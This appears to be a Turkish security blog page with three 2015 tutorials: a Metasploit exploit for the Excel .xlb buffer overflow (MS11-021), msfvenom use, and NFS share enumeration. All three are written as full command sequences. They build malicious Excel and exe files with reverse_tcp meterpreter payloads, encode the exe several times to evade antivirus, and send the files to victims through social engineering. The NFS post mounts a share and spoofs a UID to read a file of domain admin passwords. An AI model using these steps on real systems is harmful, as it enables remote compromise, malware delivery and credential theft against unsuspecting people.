Siber Güvenlik etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Siber Güvenlik etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

18 Temmuz 2015 Cumartesi

Microsoft Office 2007 Excel .xlb Buffer Overflow Zafiyeti - Detaylı Anlatım

Standard

Windows Xp Sp2 ve Sp3 'lerde bulunan Microsoft Office 2007 Excel .xlb Buffer Overflow zafiyetini test edelim. Ben daha önceden vwmare  kurmuş  olduğum XP işletim sisteminde deneyeceğim.

Kullanacağız Exploit ;
exploit/windows/fileformat/ms11_021_xlb_bof

Kali Linux'umuzu açalım ve metasploitimizi çalıştıralım. Kali'de terminalimizi açalım ve msfconsole komutumuzu yazalım.


Aşağıda bulunan Resim-1'deki gibi komutumuzu yazalım, exploitimiz ayarlarını görüntüleyelim ve çalıştıralım.

Komutumuz :

  • use exploit/windows/fileformat/ms11_021_xlb_bof
RESİM - 1

Daha sonra payloadımızı çağıralım.

  • set PAYLOAD windows/meterpreter/reverse_tcp
RESİM-2

Ayarlarımızı kontrol edelim
  • show options
RESİM-3

Kalimizin İp adresini ve portumuzu belirledikten sonra exploitimizi çalıştıralım.
  • set LHOST {Kali Linux İp Adresinizi Yazınız}
  • run
RESİM-4

msf.xlb dosyamızı oluşturduk. Şimdi dosyamızı Desktop altına kopyalayalım

  • cp /root/.msf4/local/msf.xlb /root/Desktop/
RESİM-5



  • use multi/handler

RESİM-6

Şimdi ise ip adresimizde 4444'lü portumuzu dinlemeye almak için payloadımızı yükleyelim.

  • set PAYLOAD windows/meterpreter/reverse_tcp
RESİM-7



Kali İp adresimizi girelim ve çalıştırıp  kurbanımızın açmasını bekleyelim.

  • set LHOST 192.168.5.128
  • run
RESİM-8


Şimdi bize düşen karşı tarafa bu excel dosyamızı Sosyal Mühendislik yöntemleri ile gönderip açtırmak. Ben kendi Sanal makinemde  kurmuş olduğum xp işletim sistemimde dosyamı açıp test ediyorum. Eğer işlemlerimizi doğru yaptıysak kurban dosyayı açtıktan sonra terminal ekranında meterpreter oturumunu almış olmamız gerekiyor. Dosyayı açıyorum.

RESİM-9

İşlem tamamdır artık kurbanımızın bilgisayarındayız.



Etiketler: , , , , , , , , , , , ,

9 Temmuz 2015 Perşembe

Msfvenom Kullanımı - (Detaylı)

Standard
Bu yazımda msfvenom kullanımı ve özelliklerinden bahsedeğim.
Metasploit ile gelen  msfvenom zararlı kod üretmemizi ve karşı taraftan reverse bağlantı almamızı sağlayan bir araçtır. Zararlı dosyayı oluşturup karşı tarafa Sosyal Mühendislik yöntemlerini kullanarak dosyayı açtırmayı başarmamız gerekiyor.







Öncelikle Kali Linux'umuzu açalım daha sonra terminale gelerek msfvenom -h komutunu girelim.

Resim  1

Resim 1'de görüldüğü gibi msfvenom aracının options seçeneklerini, parametrelerini ve bunların ne işe yaradıklarını görüyoruz.
Bizim Kullanacağımız parametreleri sıralayalım ;


  • -p : (Payload) Oluşturulan zararlı dosya açıldıktan sonra çalışan kod parçası
  • -e : (Encoder) Oluşturulan zararlı dosyayı antivirüslere yakalanmaması için şifreleyen araç seçiminin yapıldığı parametre
  • -i : (İterations) Oluşturulan zararlı dosyayı kaç defa şifreyeleceğini seçeceğimiz parametre
  • -b : (Bad Chars) Oluşturulan zararlı dosyanın çalışabilmesi için çıkaracağımız kötü karakterleri yazdığımız parametre
  • -f : (Format) Oluşturulan zararlı dosyayı hangi formatta kaydeceğimizi belirlediğimiz parametre
  • -a : (Architecture) Oluşturulan zararlı dosyanın hangi mimaride çalışacağını verdiğimiz parametre
  • --platform :Oluşturulan zararlı dosyanın hangi işletim sisteminde çalışacağını verdiğimiz parametre
Ben parametrelere şunları vereceğim.

  • -p : windows/meterpreter/reverse_tcp ( Kurbandan bağlantı almama yarayacak payload )
  • -e : x86/shikata_ga_nai ( Oluşturacağım zararlı dosyayı encode etmemi yarayacak encoder )
  • -i : 5 ( 5 defa encode etmesini istiyorum ) 
  • -b : \x00 ( Kötü karakteri çıkarıyorum )
  • -f : .exe ( Uygulama olarak kaydedeceğim)
  • -a : x86 ( 32 bitlik işletim sisteminde çalışmasını istiyorum )
  • --platform : windows ( Windows işletim sisteminde çalışmasını istiyorum )
  • LHOST : Kendi İp adresinizi yazın
  • LPORT : Hangi portu kullanmak istiyorsanız o portu yazın
Şimdi zararlı dosyamızı verilen parametreler ile oluşturualım. Terminale aşağıdaki gibi yazalım .

 # msfvenom -p windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai -i 5 -a x86 --platform windows LHOST=192.168.1.5 LPORT=443 -f exe  >  zararlidosya.exe

Resim 2

Resim 2 deki gibi bir çıktı aldıysanız sizde benim gibi zararlı dosyayı oluşturmuş oldunuz.
Artık yapmanız gerek Metasploitte 443'lü portunuzu dinleyeme almak ve Sosyal Mühendislik becerilerinizle karşı tarafa bu dosyayı yollayıp açtırmak.

Etiketler: , , , , , , , , , , , , , , ,

3 Temmuz 2015 Cuma

Network Sistemlerinde Bulunan NFS Zafiyeti ve Tespiti

Standard

NFS Tespiti ve Zafiyeti

Arkadaşlar bugün Nfs sisteminde bulunan çoğu zaman hackerlar tarafından krtik bilgilerin ele geçirildiği zafiyetten bahsedeceğim.

Kısaca NFS (Network File System) Nedir ?

  • UNIX'in doğal dosya paylaşım sistemidir.
  • Yerel bir ağda, birbirine bağlı Linux sistemlerin, aralarında  dosya paylaşımını sağlayan bir teknolojidir.
  • Üzerindeki dosya sisteminin  tamamını veya bir bölümünü yerel ağ üzerindeki  diğer makinelerin paylaşımına açar.
  • 2049/TCP portunda çalışır.

NFS Zafiyeti Oluşumu

Network sızma testi yapılan firmaların bir çoğunda dosya paylaşımında bir çok veri elde edilir. Biz şimdi bu paylaşımın açık olduğunu düşündüğümüz bir sistemi tespit edelim.

Kullanılan Araçlar

  • Nmap
  • Metasploit

Nmap İle Network'te NFS Servisi Tespiti

nmap -n -PN -sS -T5 -p 2049 --script=nfs-showmount  GATEWAY-ADRESİ/İP-BLOĞU

Metasploit ile Network'te NFS Servisi Tespiti

msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set RHOSTS GATEWAY-ADRESİ/İP-BLOĞU
msf auxiliary(nfsmount) > run
Tespit edilen paylaşımlar yerel sisteme nasıl bağlanır ?

#mount -t nfs 192.168.0.1:/export/home /home/user/Desktop/baglama_dizini


Evet paylaşımı yerel sistemde Masaüstüne bağladık. Şimdi terminalde paylaşımda bulunulan argümanları ve hangi UID değeri sahip bir kullanıcıya ait olduğunu görelim.

-rwxr----- 1923 1000 1898 domainAdminveSifreleri.doc


Paylaşıma açık olan klasörde kritik bilgilerin olduğu görüyoruz. Fakat bu doc dosyasını yetkili kullanıcı UID değerine sahip bir kullanıcı ile acmamız gerekebilir. Öncelikle mount ettiğimiz bağı unmount komutuyla çözelim. Daha sonra  yerel sistemde aynı UID değere sahip olan bir kullanıcı acalım.

# umount /baglama_dizini


Evet bağımızı başarıyla çözdük. Şimdi aynı UID değere sahip kullanıcı acalım.

# useradd deneme


Kullanıcımızı açtık sıra geldi UID değerimizi vermeye.

# usermod -u 1923 deneme


UID değerimizi verdikten sonra tekrar paylaşımı yerel sisteme bağlayalım.

#mount -t nfs 192.168.0.1:/export/home /home/user/Desktop/baglama_dizini



Evet artık kritik bilgiye sahip domainAdminveSifreleri.doc adlı dosyamızı başarılı bir şekilde okuyabiliriz.



Etiketler: , , , , , , , , , , , , , , ,